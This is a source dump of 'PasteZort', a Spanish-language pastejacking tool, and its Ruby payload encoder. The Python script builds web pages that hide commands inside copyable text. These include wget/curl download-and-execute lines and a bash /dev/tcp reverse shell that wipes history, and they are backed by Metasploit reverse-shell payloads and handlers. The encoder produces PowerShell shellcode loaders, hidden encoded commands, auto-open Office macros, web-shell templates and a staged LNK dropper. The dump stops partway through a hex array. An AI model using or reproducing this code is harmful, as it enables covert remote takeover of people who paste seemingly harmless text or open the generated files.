Sample

├── PasteZ0rt.py ├── README.md └── encode.rb /PasteZ0rt.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #-*- coding: utf-8 -*- 3 | ############################################################################## 4 | # Creador de PasteZort: ZettaHack - Seguridad Informatica 5 | # Referencia: https://github.com/ZettaHack/PasteZort.git 6 | # Contacto: https://www.facebook.com/ZettaHack-568599933346788/ 7 | # zettahackz@gmail.com 8 | ############################################################################## 9 | 10 | 11 | import os 12 | import subprocess 13 | import atexit 14 | 15 | def Windows(): 16 | 17 | print'\033[0;31m'+"""\n------------------------------------------------------------------- 18 | -> Configuracion de Payload: 19 | -------------------------------------------------------------------""" 20 | print '\033[0;39m' 21 | 22 | NombreIndex = "index.html" 23 | NombreHandlerConfig="Handler_Metasploit" 24 | if os.path.isfile(NombreIndex): 25 | os.system("rm index.html") 26 | if os.path.isfile(NombreHandlerConfig): 27 | os.system("rm Handler_Metasploit") 28 | 29 | payload_seleccionado=int(raw_input(""" Seleccione Payload: 30 | 31 | [1] windows/meterpreter/reverse_tcp 32 | [2] windows/meterpreter/reverse_http 33 | [3] windows/meterpreter/reverse_https 34 | [4] windows/shell/reverse_tcp 35 | 36 | Payload: """)) 37 | 38 | if (payload_seleccionado == 1): 39 | payload="windows/meterpreter/reverse_tcp" 40 | elif (payload_seleccionado == 2): 41 | payload="windows/meterpreter/reverse_http" 42 | elif (payload_seleccionado == 3): 43 | payload="windows/meterpreter/reverse_https" 44 | elif (payload_seleccionado == 4): 45 | payload="windows/shell/reverse_tcp" 46 | else: 47 | print '\033[1;31m'+"¡Opcion invalida!" 48 | 49 | 50 | 51 | ip=raw_input("\n LHOST= ") 52 | port=raw_input(" LPORT= ") 53 | 54 | print '\033[1;31m'+"""\n------------------------------------------------------------------- 55 | -> Generando payload... 56 | -------------------------------------------------------------------""" 57 | print '\033[0;39m' 58 | proc = subprocess.Popen(["./encode.rb -i "+ip+" -p "+port+" -a "+payload+" -t cmd"], stdout=subprocess.PIPE, shell=True) 59 | (out, err) = proc.communicate() 60 | print '\033[1;31m'+"""\n------------------------------------------------------------------- 61 | -> ¡Payload Generado! 62 | -------------------------------------------------------------------""" 63 | print '\033[0;39m' 64 | mensaje1=raw_input(" Mensaje 1: ") 65 | mensaje2=raw_input(" Mensaje 2: ") 66 | index="index.html" 67 | job=open(index,"w") 68 | job.write("""

"""+ mensaje1 + """ c:\ & cls & """+out+""" & c:\ & cls
""" + mensaje1 + """ """ + mensaje2 + """

""") 69 | job.close() 70 | 71 | print '\033[1;31m'+"""\n------------------------------------------------------------------- 72 | -> Payload, mensajes y comandos injectados en index.html""" 73 | 74 | NombreIndex="index.html" 75 | if os.path.isfile(NombreIndex): 76 | os.system("rm /var/www/html/index.html") 77 | os.system("cp index.html /var/www/html") 78 | print '\033[1;31m'+"""------------------------------------------------------------------- 79 | -> Archivo index.html copiado en servidor local 80 | -------------------------------------------------------------------""" 81 | else: 82 | os.system("cp index.html /var/www/html") 83 | print"""------------------------------------------------------------------- 84 | -> Archivo index.html copiado en servidor local 85 | -------------------------------------------------------------------""" 86 | print""" -> URL maliciosa: http://"""+ip+"""/ 87 | -------------------------------------------------------------------""" 88 | documento="Handler_Metasploit" 89 | archivo = open(documento,"w") 90 | archivo.write("""use multi/handler 91 | set payload """+payload+""" 92 | set lhost """+ip+""" 93 | set lport """+port+""" 94 | set exitonsession false 95 | exploit -j""") 96 | archivo.close() 97 | print '\033[0;39m' 98 | iniciar_handler=str(raw_input(" ¿Desea iniciar el handler? (y/n): ")) 99 | if (iniciar_handler == 'y'): 100 | print '\033[1;31m'+"""\n------------------------------------------------------------------- 101 | -> Iniciando handler Metasploit... 102 | -------------------------------------------------------------------""" 103 | print '\033[0;39m' 104 | os.system("msfconsole -r Handler_Metasploit") 105 | elif (iniciar_handler == 'n'): 106 | print "\n ¡Completado!\n" 107 | def Linux(): 108 | print'\033[0;31m'+"""\n------------------------------------------------------------------- 109 | -> Configuracion de Payload: 110 | -------------------------------------------------------------------""" 111 | print '\033[0;39m' 112 | NombrePayload = "payload.elf" 113 | NombreIndex="index.html" 114 | if os.path.isfile(NombrePayload): 115 | os.system("rm /var/www/html/payload.elf") 116 | if os.path.isfile(NombreIndex): 117 | os.system("rm /var/www/html/index.html") 118 | payload_seleccionado=int(raw_input(""" Seleccione Payload: 119 | 120 | [1] linux/x86/meterpreter/reverse_tcp 121 | [2] linux/x86/shell/reverse_tcp 122 | [3] linux/x64/shell/reverse_tcp 123 | 124 | Payload: """)) 125 | 126 | if (payload_seleccionado == 1): 127 | payload="linux/x86/meterpreter/reverse_tcp" 128 | elif (payload_seleccionado == 2): 129 | payload="linux/x86/shell/reverse_tcp" 130 | elif (payload_seleccionado == 3): 131 | payload="linux/x64/shell/reverse_tcp" 132 | 133 | else: 134 | print '\033[1;31m'+"¡Opcion invalida!" 135 | ip=raw_input("\n LHOST= ") 136 | port=raw_input(" LPORT= ") 137 | 138 | print '\033[1;31m'+"""\n------------------------------------------------------------------- 139 | -> Generando payload... 140 | -------------------------------------------------------------------""" 141 | print '\033[0;39m' 142 | os.system("msfvenom -p "+payload+" LHOST=" + ip + " LPORT=" + port + " -f elf > /var/www/html/payload.elf") 143 | 144 | print '\033[1;31m'+"""------------------------------------------------------------------- 145 | -> ¡Payload generado! 146 | -------------------------------------------------------------------""" 147 | print '\033[0;39m' 148 | mensaje1=raw_input(" Mensaje 1: ") 149 | mensaje2=raw_input(" Mensaje 2: ") 150 | NombreIndex="index.html" 151 | job=open(NombreIndex,"w") 152 | job.write("""

""" + mensaje1 + """ /dev/null; clear; wget http://"""+ip+"""/payload.elf &> /dev/null && chmod +x ./payload.elf && ./payload.elf & disown && clear
""" + mensaje1 + """ """ + mensaje2 + """

""") 153 | job.close() 154 | 155 | print '\033[1;31m'+"""\n------------------------------------------------------------------- 156 | -> Payload, mensajes y comandos injectados en index.html""" 157 | 158 | if os.path.isfile("/var/www/html/index.html"): 159 | os.system("rm /var/www/html/index.html") 160 | os.system("cp index.html /var/www/html") 161 | print '\033[1;31m'+"""------------------------------------------------------------------- 162 | -> Archivo index.html copiado en servidor local 163 | -------------------------------------------------------------------""" 164 | else: 165 | os.system("cp index.html /var/www/html") 166 | print"""------------------------------------------------------------------- 167 | -> Archivo index.html copiado en servidor local 168 | -------------------------------------------------------------------""" 169 | print""" -> URL maliciosa: http://"""+ip+"""/ 170 | -------------------------------------------------------------------""" 171 | documento="Handler_msf_Linux" 172 | archivo = open(documento,"w") 173 | archivo.write("""use multi/handler 174 | set payload """+payload+""" 175 | set LHOST """ + ip + """ 176 | set LPORT """ + port + """ 177 | set ExitOnSession false 178 | exploit -j""") 179 | archivo.close() 180 | 181 | print '\033[0;39m' 182 | iniciar_handler=str(raw_input(" ¿Desea iniciar el handler? (y/n): ")) 183 | if (iniciar_handler == 'y'): 184 | print '\033[1;31m'+"""\n------------------------------------------------------------------- 185 | -> Iniciando handler Metasploit... 186 | -------------------------------------------------------------------""" 187 | print '\033[0;39m' 188 | os.system("msfconsole -r Handler_msf_Linux") 189 | elif (iniciar_handler == 'n'): 190 | print "\n ¡Completado!\n" 191 | def MacOSX(): 192 | global payload 193 | global formato 194 | global extension 195 | global ejecucion 196 | ejecucion="./" 197 | print'\033[0;31m'+"""\n------------------------------------------------------------------- 198 | -> Configuracion de Payload: 199 | -------------------------------------------------------------------""" 200 | print '\033[0;39m' 201 | NombreIndex="index.html" 202 | 203 | if os.path.isfile(NombreIndex): 204 | os.system("rm /var/www/html/index.html") 205 | 206 | payload_seleccionado=int(raw_input(""" Seleccione Payload: 207 | 208 | [1] reverse shell netcat 209 | [2] osx/x86/shell_reverse_tcp 210 | [3] java/meterpreter/reverse_tcp 211 | [4] python/meterpreter/reverse_tcp 212 | 213 | Payload: """)) 214 | 215 | if (payload_seleccionado == 1): 216 | NetcatMacOSX() 217 | elif (payload_seleccionado == 2): 218 | payload="osx/x86/shell_reverse_tcp" 219 | formato="macho" 220 | extension="macho" 221 | ShellMacOSX() 222 | elif (payload_seleccionado == 3): 223 | payload="java/meterpreter/reverse_tcp" 224 | formato="jar" 225 | extension="jar" 226 | ejecucion="java -jar " 227 | ShellMacOSX() 228 | elif (payload_seleccionado == 4): 229 | payload="python/meterpreter/reverse_tcp" 230 | formato="raw" 231 | extension="py" 232 | ejecucion="python " 233 | ShellMacOSX() 234 | else: 235 | print '\033[1;31m'+"¡Opcion invalida!" 236 | def NetcatMacOSX(): 237 | ip=raw_input("\n LHOST= ") 238 | port=raw_input(" LPORT= ") 239 | 240 | print '\033[1;31m'+"""\n------------------------------------------------------------------- 241 | -> Generando payload... 242 | -------------------------------------------------------------------""" 243 | print '\033[0;39m' 244 | 245 | 246 | print '\033[1;31m'+"""------------------------------------------------------------------- 247 | -> ¡Payload generado! 248 | -------------------------------------------------------------------""" 249 | print '\033[0;39m' 250 | mensaje1=raw_input(" Mensaje 1: ") 251 | mensaje2=raw_input(" Mensaje 2: ") 252 | #comando=raw_input(" Comando: ") 253 | 254 | NombreIndex="index.html" 255 | job=open(NombreIndex,"w") 256 | ##/bin/bash 0"""+"""<"""+"""/dev/tcp/"""+ip+"""/"""+port+""" 1>&0 2>&0 & clear; clear 257 | job.write("""

""" + mensaje1 + """\n ;/bin/bash -i >& /dev/tcp/"""+ip+"""/"""+port+""" 0>&1 & clear; clear; history -c
""" + mensaje1 + """ """ + mensaje2 + """

""") 258 | job.close() 259 | 260 | print '\033[1;31m'+"""\n------------------------------------------------------------------- 261 | -> Payload, mensajes y comandos injectados en index.html""" 262 | 263 | if os.path.isfile("/var/www/html/index.html"): 264 | os.system("rm /var/www/html/index.html") 265 | os.system("cp index.html /var/www/html") 266 | print '\033[1;31m'+"""------------------------------------------------------------------- 267 | -> Archivo index.html copiado en servidor local 268 | -------------------------------------------------------------------""" 269 | else: 270 | os.system("cp index.html /var/www/html") 271 | print"""------------------------------------------------------------------- 272 | -> Archivo index.html copiado en servidor local 273 | -------------------------------------------------------------------""" 274 | print""" -> URL maliciosa: http://"""+ip+"""/ 275 | -------------------------------------------------------------------""" 276 | print '\033[0;39m' 277 | iniciar_handler=str(raw_input(" ¿Desea iniciar el escuchador? (y/n): ")) 278 | if (iniciar_handler == 'y'): 279 | print '\033[1;31m'+"""\n------------------------------------------------------------------- 280 | -> Iniciando listener... 281 | -------------------------------------------------------------------""" 282 | print '\033[0;39m' 283 | os.system("nc -lvp "+port) 284 | elif (iniciar_handler == 'n'): 285 | print "\n ¡Completado!\n" 286 | def ShellMacOSX(): 287 | print'\033[0;31m'+"""\n------------------------------------------------------------------- 288 | -> Configuracion de Payload: 289 | -------------------------------------------------------------------""" 290 | print '\033[0;39m' 291 | NombrePayload = "osx."+extension 292 | NombreIndex="index.html" 293 | if os.path.isfile(NombrePayload): 294 | os.system("rm /var/www/html/osx."+extension) 295 | if os.path.isfile(NombreIndex): 296 | os.system("rm /var/www/html/index.html") 297 | 298 | ip=raw_input("\n LHOST= ") 299 | port=raw_input(" LPORT= ") 300 | 301 | print '\033[1;31m'+"""\n------------------------------------------------------------------- 302 | -> Generando payload... 303 | -------------------------------------------------------------------""" 304 | print '\033[0;39m' 305 | os.system("msfvenom -p "+payload+" LHOST=" + ip + " LPORT=" + port + " -f "+formato+" > /var/www/html/osx."+extension) 306 | 307 | print '\033[1;31m'+"""------------------------------------------------------------------- 308 | -> ¡Payload generado! : """+payload+""" 309 | -------------------------------------------------------------------""" 310 | print '\033[0;39m' 311 | mensaje1=raw_input(" Mensaje 1: ") 312 | mensaje2=raw_input(" Mensaje 2: ") 313 | NombreIndex="index.html" 314 | job=open(NombreIndex,"w") 315 | job.write("""

""" + mensaje1 + """ ;curl -O http://"""+ip+"""/osx."""+extension+""";chmod +x osx."""+extension+""";"""+ejecucion+"""osx."""+extension+""" & history -c;clear
""" + mensaje1 + """ """ + mensaje2 + """

""") 316 | job.close() 317 | 318 | print '\033[1;31m'+"""\n------------------------------------------------------------------- 319 | -> Payload, mensajes y comandos injectados en index.html""" 320 | 321 | if os.path.isfile("/var/www/html/index.html"): 322 | os.system("rm /var/www/html/index.html") 323 | os.system("cp index.html /var/www/html") 324 | print '\033[1;31m'+"""------------------------------------------------------------------- 325 | -> Archivo index.html copiado en servidor local 326 | -------------------------------------------------------------------""" 327 | else: 328 | os.system("cp index.html /var/www/html") 329 | print"""------------------------------------------------------------------- 330 | -> Archivo index.html copiado en servidor local 331 | -------------------------------------------------------------------""" 332 | print""" -> URL maliciosa: http://"""+ip+"""/ 333 | -------------------------------------------------------------------""" 334 | documento="Handler_msf_MacOSX" 335 | archivo = open(documento,"w") 336 | archivo.write("""use multi/handler 337 | set payload """+payload+""" 338 | set LHOST """ + ip + """ 339 | set LPORT """ + port + """ 340 | set ExitOnSession false 341 | exploit -j""") 342 | archivo.close() 343 | 344 | print '\033[0;39m' 345 | iniciar_handler=str(raw_input(" ¿Desea iniciar el handler? (y/n): ")) 346 | if (iniciar_handler == 'y'): 347 | print '\033[1;31m'+"""\n------------------------------------------------------------------- 348 | -> Iniciando handler Metasploit... 349 | -------------------------------------------------------------------""" 350 | print '\033[0;39m' 351 | os.system("msfconsole -r Handler_msf_MacOSX") 352 | elif (iniciar_handler == 'n'): 353 | print "\n ¡Completado!\n" 354 | os.system("clear") 355 | print """ _________________________________________________________________ 356 | | --------------------------------------------------------------- | 357 | || ____ _ _____ _ || 358 | || | _ \ __ _ ___| |_ ___|__ /___ _ __| |_ || 359 | || | |_) / _` / __| __/ _ \ / // _ \| '__| __| || 360 | || | __/ (_| \__ \ || __// /| (_) | | | |_ || 361 | || |_| \__,_|___/\__\___/____\___/|_| \__| || 362 | || ----------- || 363 | || |v| |0|.|1| || 364 | || ----------- || 365 | || ______ _ _ _ _ _ || 366 | || |___ / | | | | | | | | | | || 367 | || / / ___| |_| |_ __ _| |__| | __ _ ___| | __ || 368 | || / / / _ \ __| __/ _` | __ |/ _` |/ __| |/ / || 369 | || / /_| __/ |_| || (_| | | | | (_| | (__| < || 370 | || /_____\___|\__|\__\__,_|_| |_|\__,_|\___|_|\_\ || 371 | || || 372 | | --------------------------------------------------------------- | 373 | |_________________________________________________________________| 374 | """ 375 | print'\033[1;31m'+"""------------------------------------------------------------------- 376 | -> Iniciando servidor Apache: 377 | -------------------------------------------------------------------""" 378 | +os.system("service apache2 start") 379 | 380 | print """ -> ¡Apache Listo! 381 | -------------------------------------------------------------------""" 382 | print '\033[0;39m' 383 | OS_Objetivo=int(raw_input(""" Sistema operativo objetivo: 384 | 385 | [1] Windows 386 | [2] Linux 387 | [3] Mac OSX 388 | 389 | Objetivo: """)) 390 | 391 | if (OS_Objetivo == 1): 392 | Windows() 393 | elif (OS_Objetivo == 2): 394 | Linux() 395 | elif (OS_Objetivo == 3): 396 | MacOSX() 397 | else: 398 | print '\033[1;31m'+"¡Opcion invalida!" 399 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # PasteZort 2 | Pastejacking - PasteZort 3 | 4 | # Uso: 5 | 6 | ./PasteZort.py 7 | 8 | 9 | -------------------------------------------------------------------------------- /encode.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/ruby 2 | 3 | require 'optparse' 4 | require 'base64' 5 | 6 | options = {} 7 | 8 | optparse = OptionParser.new do|opts| 9 | 10 | opts.banner = "Usage: ps1encode.rb --LHOST [default = 127.0.0.1] --LPORT [default = 443] --PAYLOAD [default = windows/meterpreter/reverse_https] --ENCODE [default = cmd]" 11 | opts.separator "" 12 | 13 | options[:LHOST] = "127.0.0.1" 14 | options[:LPORT] = "443" 15 | options[:PAYLOAD] = "windows/meterpreter/reverse_https" 16 | options[:ENCODE] = "cmd" 17 | 18 | opts.on('-i', '--LHOST VALUE', "Local host IP address") do |i| 19 | options[:LHOST] = i 20 | end 21 | 22 | opts.on('-p', '--LPORT VALUE', "Local host port number") do |p| 23 | options[:LPORT] = p 24 | end 25 | 26 | opts.on('-a', '--PAYLOAD VALUE', "Payload to use") do |a| 27 | options[:PAYLOAD] = a 28 | end 29 | 30 | opts.on('-t', '--ENCODE VALUE', "Output format: raw, cmd, vba, vbs, war, exe, java, js, js-rd32, php, hta, cfm, aspx, lnk, sct") do |t| 31 | options[:ENCODE] = t 32 | end 33 | opts.separator "" 34 | end 35 | 36 | if ARGV.empty? 37 | puts optparse 38 | exit 39 | else 40 | optparse.parse! 41 | end 42 | 43 | $lhost = options[:LHOST] 44 | $lport = options[:LPORT] 45 | $lpayload = options[:PAYLOAD] 46 | $lencode = options[:ENCODE] 47 | 48 | #string byte to hex 49 | class String 50 | def to_hex 51 | #"0x" + self.to_i.to_s(16) 52 | sprintf("0x%02x", self.to_i) 53 | end 54 | end 55 | 56 | def gen_PS_shellcode() 57 | 58 | results = [] 59 | resultsS = "" 60 | 61 | #generate the shellcode via msfvenom and write to a temp txt file 62 | system("msfvenom -p #{$lpayload} LHOST=#{$lhost} LPORT=#{$lport} -s 341 -f raw > raw_shellcode_temp") 63 | 64 | #taking raw shellcode, each byte goes into array 65 | File.open('raw_shellcode_temp').each_byte do |b| 66 | results << b 67 | end 68 | 69 | #remove temp 70 | system("rm raw_shellcode_temp") 71 | 72 | #go through the array, convert each byte in the array to a hex string 73 | results.each do |i| 74 | resultsS = resultsS + i.to_s.to_hex + "," 75 | end 76 | 77 | #remove last unnecessary comma 78 | resultsS = resultsS.chop 79 | 80 | #powershell script to be executed pre-encode 81 | finstring = "$1 = '$c = ''[DllImport(\"kernel32.dll\")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport(\"kernel32.dll\")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport(\"msvcrt.dll\")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name \"Win32\" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc = #{resultsS};$size = 0x1000;if ($sc.Length -gt 0x1000){$size = $sc.Length};$x=$w::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$gq = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));if([IntPtr]::Size -eq 8){$x86 = $env:SystemRoot + \"\\syswow64\\WindowsPowerShell\\v1.0\\powershell\";$cmd = \"-nop -noni -enc \";iex \"& $x86 $cmd $gq\"}else{$cmd = \"-nop -noni -enc\";iex \"& powershell $cmd $gq\";}" 82 | 83 | #convert to UTF-16 (powershell interprets base64 of UTF-16) 84 | ec = Encoding::Converter.new("UTF-8", "UTF-16LE") 85 | utfEncoded = ec.convert(finstring) 86 | 87 | #string to base64 - final 88 | finPS = Base64.encode64(utfEncoded).gsub(/\n/, '') 89 | 90 | return finPS 91 | end 92 | 93 | 94 | def prep_PS_chunk(ps_shellcode) 95 | #The below iterates through the string and chops up strings into 254 character lengths & puts it into a 2-dimensional array 96 | splitup = [] 97 | splitup = ps_shellcode.scan(/.{1,254}/) 98 | 99 | stringCommands="" 100 | varFinal="stringFinal=stringA+stringB+" 101 | 102 | splitup = splitup.flatten #make the 2-dimensional array 1-dimensional to easier iterate 103 | splitup.each_with_index do |val, index| #cycle through the array and create the strings for VBA 104 | val=val.tr '"','' #strip out any prior quotes in the command 105 | stringCommands = stringCommands+"string#{index}=\"#{val}\"\n" 106 | varFinal=varFinal+"string#{index}+" 107 | end 108 | 109 | varFinal=varFinal[0..-2] #create the final command that will be executed, this removes the "+" sign from the last command 110 | return stringCommands + "\n" + varFinal 111 | end 112 | 113 | ###########################RAW_ENCODE########################### 114 | if $lencode == "raw" 115 | 116 | powershell_encoded = gen_PS_shellcode() 117 | puts powershell_encoded 118 | 119 | end 120 | 121 | ##########################CMD_ENCODE########################### 122 | if $lencode == "cmd" 123 | 124 | powershell_encoded = gen_PS_shellcode() 125 | puts "powershell -nop -win Hidden -noni -enc " + powershell_encoded 126 | 127 | end 128 | 129 | ########################VBA_ENCODE############################### 130 | if $lencode == "vba" 131 | 132 | powershell_encoded = gen_PS_shellcode() 133 | prepped_powershell_encoded = prep_PS_chunk(powershell_encoded) 134 | 135 | #final VBA template 136 | vbaTEMPLATE = %{Sub Auto_Open() 137 | 138 | stringA = "power" 139 | stringB = "shell.exe -NoE -NoP -NonI -W Hidden -E " 140 | 141 | #{prepped_powershell_encoded} 142 | 143 | Shell stringFinal, 0 144 | End Sub 145 | 146 | Sub AutoOpen() 147 | Auto_Open 148 | End Sub 149 | Sub Workbook_Open() 150 | Auto_Open 151 | End Sub 152 | } 153 | puts vbaTEMPLATE 154 | 155 | end 156 | 157 | ######################VBS_ENCODE############################### 158 | if $lencode == "vbs" 159 | 160 | powershell_encoded = gen_PS_shellcode() 161 | 162 | vbsTEMPLATE = %{Set objShell = CreateObject("Wscript.Shell") 163 | objShell.Run "powershell -nop -win Hidden -noni -enc #{powershell_encoded}", 0 164 | } 165 | 166 | puts vbsTEMPLATE 167 | 168 | end 169 | 170 | ########################WAR_ENCODE############################### 171 | if $lencode == "war" 172 | 173 | powershell_encoded = gen_PS_shellcode() 174 | 175 | warTEMPLATE = %{<%@ page import="java.io.*" %> 176 | 177 | 178 | Sample 179 | 180 | 181 | <% 182 | String yourCommand[]=\{"cmd.exe" ,"/C", " powershell -nop -win Hidden -noni -enc #{powershell_encoded} "\}; 183 | try \{ 184 | Process p = Runtime.getRuntime().exec(yourCommand); 185 | BufferedReader stdInput = new BufferedReader(new InputStreamReader(p.getInputStream())); 186 | BufferedReader stdError = new BufferedReader(new InputStreamReader(p.getErrorStream())); 187 | \} catch (IOException ioe) \{ 188 | System.err.println("\\n\\n\\nIOException: "+ ioe.toString()); 189 | \} 190 | %> 191 | 192 | 193 | } 194 | 195 | #web.xml - saved within WEB-INF directory 196 | webxmlTEMPLATE = %{ 197 | 200 | 201 | 202 | Sample 203 | /sample.jsp 204 | 205 | 206 | } 207 | 208 | 209 | #temp dir - write in jsp file 210 | system("mkdir wartemp") 211 | 212 | jsp_file_temp = File.new("wartemp/sample.jsp", "w") 213 | jsp_file_temp.write(warTEMPLATE) 214 | jsp_file_temp.close 215 | 216 | #new WEB-INF directory, write in web.xml 217 | system("mkdir wartemp/WEB-INF") 218 | 219 | webxml_file_temp = File.new("wartemp/WEB-INF/web.xml", "w") 220 | webxml_file_temp.write(webxmlTEMPLATE) 221 | webxml_file_temp.close 222 | 223 | #Create JAR file 224 | system("jar -cvf sample.war -C wartemp/ .") 225 | 226 | #clean up 227 | system("rm -r wartemp") 228 | 229 | end 230 | 231 | ########################EXE_ENCODE############################### 232 | if $lencode == "exe" 233 | 234 | #determine if MinGW has been installed, support new and old MinGW system paths 235 | mingw = false 236 | mingw = true if File::exists?('/usr/bin/x86_64-w64-mingw32-gcc') 237 | if mingw == false 238 | puts "Must have MinGW installed in order to compile EXEs!!" 239 | puts "\n\tRun to download: apt-get install mingw-w64 \n" 240 | exit 1 241 | end 242 | 243 | powershell_encoded = gen_PS_shellcode() 244 | 245 | exeTEMPLATE = %{#include 246 | #include 247 | 248 | int main() 249 | \{ 250 | system("powershell -nop -win Hidden -noni -enc #{powershell_encoded}"); 251 | return 0; 252 | \} 253 | 254 | } 255 | 256 | #write out to a new file 257 | c_file_temp = File.new("c_file_temp.c", "w") 258 | c_file_temp.write(exeTEMPLATE) 259 | c_file_temp.close 260 | 261 | #compiling will require MinGW installed - "apt-get install mingw32" 262 | puts "compiling..." 263 | 264 | system("x86_64-w64-mingw32-gcc c_file_temp.c -o final_.exe") 265 | system("rm c_file_temp.c") 266 | 267 | puts "final_.exe created!" 268 | 269 | end 270 | 271 | ########################JAVA_ENCODE############################### 272 | if $lencode == "java" 273 | 274 | powershell_encoded = gen_PS_shellcode() 275 | 276 | javaTEMPLATE = %{import java.applet.*; 277 | import java.awt.*; 278 | import java.io.*; 279 | public class Java extends Applet \{ 280 | public void init() \{ 281 | Process f; 282 | 283 | String cmd = "cmd.exe /c powershell -nop -win Hidden -noni -enc #{powershell_encoded}"; 284 | try \{ 285 | f = Runtime.getRuntime().exec(cmd); 286 | \} 287 | catch(IOException e) \{ 288 | e.printStackTrace(); 289 | \} 290 | Process s; 291 | \} 292 | \} 293 | } 294 | 295 | puts javaTEMPLATE 296 | 297 | end 298 | 299 | ########################JS_ENCODE############################### 300 | if $lencode == "js" 301 | 302 | powershell_encoded = gen_PS_shellcode() 303 | 304 | jsTEMPLATE = %{var objShell = new ActiveXObject("WScript.shell"); 305 | objShell.run("powershell -nop -win Hidden -noni -enc #{powershell_encoded}", 0); 306 | } 307 | 308 | puts jsTEMPLATE 309 | 310 | end 311 | 312 | ########################JS-RD32_ENCODE############################### 313 | if $lencode == "js-rd32" 314 | 315 | powershell_encoded = gen_PS_shellcode() 316 | 317 | stageURL = String.new 318 | 319 | puts "This encoding format requires staging" 320 | puts "Enter the full URL on which the payload will be hosted:" 321 | stageURL = gets.chomp! 322 | 323 | 324 | jsrd32TEMPLATE = %{ 325 | 326 | 327 | 328 | 329 | 334 | 335 | 336 | 337 | } 338 | 339 | File.write('index.html', jsrd32TEMPLATE) 340 | puts "Payload created! - index.html\n\n\n" 341 | 342 | 343 | puts "-------------copy the index.html and host it on #{stageURL}--------------" 344 | puts "To run, execute the following on the target system:\nrundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:#{stageURL}/index.html\")" 345 | 346 | end 347 | 348 | ######################PHP_ENCODE############################### 349 | if $lencode == "php" 350 | 351 | powershell_encoded = gen_PS_shellcode() 352 | 353 | phpTEMPLATE = %{ 356 | } 357 | 358 | puts phpTEMPLATE 359 | 360 | end 361 | 362 | ######################HTA_ENCODE############################### 363 | if $lencode == "hta" 364 | 365 | powershell_encoded = gen_PS_shellcode() 366 | 367 | htaTEMPLATE = %{ 368 | 369 | 373 | 374 | 375 | 376 | 377 | 378 | } 379 | 380 | puts htaTEMPLATE 381 | 382 | end 383 | 384 | ######################CFM_ENCODE############################### 385 | if $lencode == "cfm" 386 | 387 | powershell_encoded = gen_PS_shellcode() 388 | 389 | cfmTEMPLATE = %{ 392 | 393 | } 394 | 395 | puts cfmTEMPLATE 396 | 397 | end 398 | 399 | ######################ASPX_ENCODE############################## 400 | if $lencode == "aspx" 401 | 402 | powershell_encoded = gen_PS_shellcode() 403 | 404 | aspxTEMPLATE = %{ 405 | <%@ Page Language="C#" AutoEventWireup="true" %> 406 | <%@ Import Namespace="System.Diagnostics" %> 407 | 415 | } 416 | 417 | puts aspxTEMPLATE 418 | 419 | end 420 | 421 | ######################LNK_ENCODE############################## 422 | if $lencode == "lnk" 423 | 424 | # Shortcut command has length limitations of 259 characters. Need to stage the payload. 425 | stageURL = String.new 426 | 427 | puts "This encoding format requires staging" 428 | puts "Enter the full URL on which the payload will be hosted:" 429 | stageURL = gets.chomp! 430 | 431 | 432 | lnkTEMPLATE = "-nop -win Hidden -noni -command \"IEX (New-Object Net.WebClient).DownloadString('#{stageURL}/file.html')\"" 433 | 434 | # Converting string to an array of char and to HEX 435 | lnkTEMPLATE_AR = lnkTEMPLATE.split(//) 436 | lnkTEMPLATE_AR.each_with_index {|val, index| 437 | lnkTEMPLATE_AR[index] = val.unpack('H*') } 438 | 439 | lnkTEMPLATE_fin = lnkTEMPLATE_AR.join(" 00 ") 440 | 441 | 442 | # Pulling the length of the command 443 | lnkLENGTH = lnkTEMPLATE.length 444 | # To Hex 445 | lnkLENGTH = lnkLENGTH.to_s(16) 446 | 447 | 448 | # Windows shortcut HEX template array 449 | lnkPAYLOAD = "4C 00 00 00 01 14 02 00 00 00 00 00 C0 00 00 00 00 00 00 46 BB 00 08 00 20 00 00 00 12 27 43 C8 FF BA D0 01 12 27 43 C8 FF BA D0 01 12 27 43 C8 FF BA D0 01 00 86 07 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 02 14 00 1F 50 E0 4F D0 20 EA 3A 69 10 A2 D8 08 00 2B 30 30 9D 19 00 2F 43 3A 5C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 00 31 00 00 00 00 00 6F 47 E2 2C 10 00 57 69 6E 64 6F 77 73 00 40 00 09 00 04 00 EF BE EA 46 AF 48 6F 47 E2 2C 2E 00 00 00 99 33 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 EA A9 0C 01 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 00 00 16 00 5A 00 31 00 00 00 00 00 7A 47 34 11 10 00 53 79 73 74 65 6D 33 32 00 00 42 00 09 00 04 00 EF BE EA 46 AF 48 7A 47 34 11 2E 00 00 00 07 92 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4C 2B 21 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 00 00 18 00 6C 00 31 00 00 00 00 00 EA 46 8C 58 10 00 57 49 4E 44 4F 57 7E 31 00 00 54 00 09 00 04 00 EF BE EA 46 8C 58 EA 46 8C 58 2E 00 00 00 6F 96 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 E4 AF 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 50 00 6F 00 77 00 65 00 72 00 53 00 68 00 65 00 6C 00 6C 00 00 00 18 00 4E 00 31 00 00 00 00 00 FB 46 B5 24 14 00 76 31 2E 30 00 00 3A 00 09 00 04 00 EF BE EA 46 8C 58 FB 46 B5 24 2E 00 00 00 70 96 00 00 00 00 03 00 